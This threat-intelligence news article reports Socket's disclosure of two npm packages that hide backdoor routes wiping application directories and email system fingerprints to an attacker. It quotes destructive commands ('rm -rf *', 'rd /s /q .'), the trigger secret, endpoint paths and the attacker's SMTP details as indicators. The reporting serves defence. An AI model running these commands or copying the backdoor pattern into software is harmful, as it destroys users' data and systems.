Destructive npm Packages Disguised as Utilities Trigger Remote System Wipes on Demand
Ddos 
The Socket Threat Research Team has disclosed two dangerous npm packages that masquerade as helpful developer tools—but are in fact remote-controlled data-wiping time bombs. These malicious packages, published by npm user botsailer under the names express-api-sync and system-health-sync-api, embed hidden endpoints capable of executing system-level file deletion commands with a single POST request.
“Both express-api-sync and system-health-sync-api secretly register hidden endpoints that, when triggered with the right credentials, execute file deletion commands that wipe out entire application directories,” Socket warns.
Marketed as a utility to sync databases, express-api-sync is a pure backdoor. It adds inconspicuous Express middleware that quietly registers a route (/api/this/that) on the first HTTP request. This route listens for a hardcoded secret (DEFAULT_123) and, if received, immediately executes:
“Once triggered, the rm -rf * command executes in the application’s working directory, deleting all files, including source code, configuration files, uploaded assets, and any local databases,” the report explains.
What makes it worse:
- It logs nothing.
- It catches errors silently.
- It blends in with normal middleware.
The system-health-sync-api package is a full-fledged espionage and destruction toolkit. This package includes:
- Legitimate dependencies (nodemailer, performance-now)
- Fake health monitoring APIs
- Working endpoints to appear useful
- Cross-platform deletion logic for both Windows (rd /s /q .) and Unix (rm -rf *)
Before wiping anything, it fingerprinted the system:
- Hostname
- IP address
- Working directory
- Process ID
- Hash of environment variables
“The environment variables hash is particularly concerning… it creates a unique fingerprint that could help attackers identify servers with specific configurations,” the report notes.
The malware communicates through email using poorly obfuscated hardcoded SMTP credentials. It connects to smtp.hostinger.com and sends alerts to anupm019@gmail[.]com, including:
- Backend URL
- Server status
- Environment fingerprints
“Using SMTP for data exfiltration is clever since most firewalls allow outbound email traffic, and it blends in with legitimate application emails.”
Even the SMTP password, Rebel@shree1, was trivially base64-encoded.
To ensure the backdoor works no matter the setup:
- It auto-detects frameworks: Express, Fastify, or raw Node.js
- It creates three endpoints: /system/health, /sys/maintenance, and a standard GET health check
- It even provides hints in HTTP error messages to guide misuse
Developers who installed either package may have unknowingly handed attackers:
- Their infrastructure fingerprints
- A trigger for remote system deletion
- Backdoor access via standard HTTP routes
As Socket’s team warned that the packages implement backdoors designed to destroy production systems.
Related Posts:
- Palo Alto Networks Revealed Worldwide Linux XorDDoS Campaign
- Annoying browser “download bomb” reappears in Chrome
- FBI, CISA, NSA Warn of Iranian Cyberattacks on Critical Infrastructure
- Adobe releases the security updates to fix Remote Code Execution/Arbitrary file deletion in multi products
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
